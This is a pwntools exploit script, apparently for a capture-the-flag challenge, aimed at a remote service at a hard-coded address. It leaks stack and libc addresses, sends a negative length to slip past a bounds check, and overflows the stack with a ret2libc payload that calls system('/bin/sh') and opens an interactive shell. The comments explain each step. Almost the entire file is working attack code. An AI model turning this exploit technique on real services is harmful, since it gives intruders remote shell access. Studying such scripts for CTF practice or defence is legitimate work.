#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Python 2 pwntools script (print statements, str payloads) written against a
# single remote service.  Every address it computes is derived from the local
# copy of the target's libc, so the script is only meaningful for that exact
# libc build and that one host/port.
from pwn import *
# Target endpoint is hard-coded.
host = "35.198.98.140"
port = 45067
# Offsets are read from the libc shipped with the challenge, not resolved at
# runtime on the remote side.
libc=ELF('./libc.so.6')
p = remote(host,port)
offset=libc.symbols['setbuffer']
system_off=libc.symbols['system']
# Hard-coded libc offset; the print further down labels it "/bin/sh".  It is
# not taken from the symbol table, so it has to match this libc build --
# verify against ./libc.so.6 before reuse.
sh_offset=0x015cd48
p.recvuntil(":")
# Sends 16 bytes ending in 'b'; whatever the service returns after the 'ab'
# marker is treated as leaked memory (inferred: the service appears to echo
# past the bytes that were supplied -- an information-disclosure defect).
p.send('a'*15+'b')
p.recvuntil('ab')
# Strip the trailing 14-byte prompt "Enter length: " so only leaked bytes remain.
data=p.recvuntil("Enter length: ")[:-14]
# enhex() of the byte-reversed 4-byte slice == little-endian 32-bit decode.
buff_adr=int(enhex(data[:4][::-1]),16)
# The last 4 leaked bytes are read as a pointer and adjusted by 11; the
# adjustment is target-specific (presumably a return address inside setbuffer
# -- TODO confirm against the binary).
setbuffer_addr=int(enhex(data[-4:][::-1]),16)-11
print "buffer"
print hex(buff_adr)
# Classic libc-base recovery: leaked in-memory symbol address minus that
# symbol's offset in the libc file.
libc_base=setbuffer_addr-offset
sh=libc_base+sh_offset
print "libc_base"
print hex(libc_base)
print "system"
print hex(libc_base+system_off)
print "/bin/sh"
print hex(sh)
# A negative value is supplied where the service asks for a length; the rest
# of the script relies on the service not rejecting it (inferred: a signed
# length that is not bounds-checked -- the defect to fix on the server side).
p.sendline("-1")
print p.recvuntil(":")
# Fixed-size 32-bit (p32) payload laid out for this binary's stack frame; the
# 80/28 filler sizes and the +0x10 adjustment are specific to the target.
payload="a"*80+p32(buff_adr+0x10)+28*"a"+p32(libc_base+system_off)+p32(sh)*10
p.sendline(payload)
p.interactive()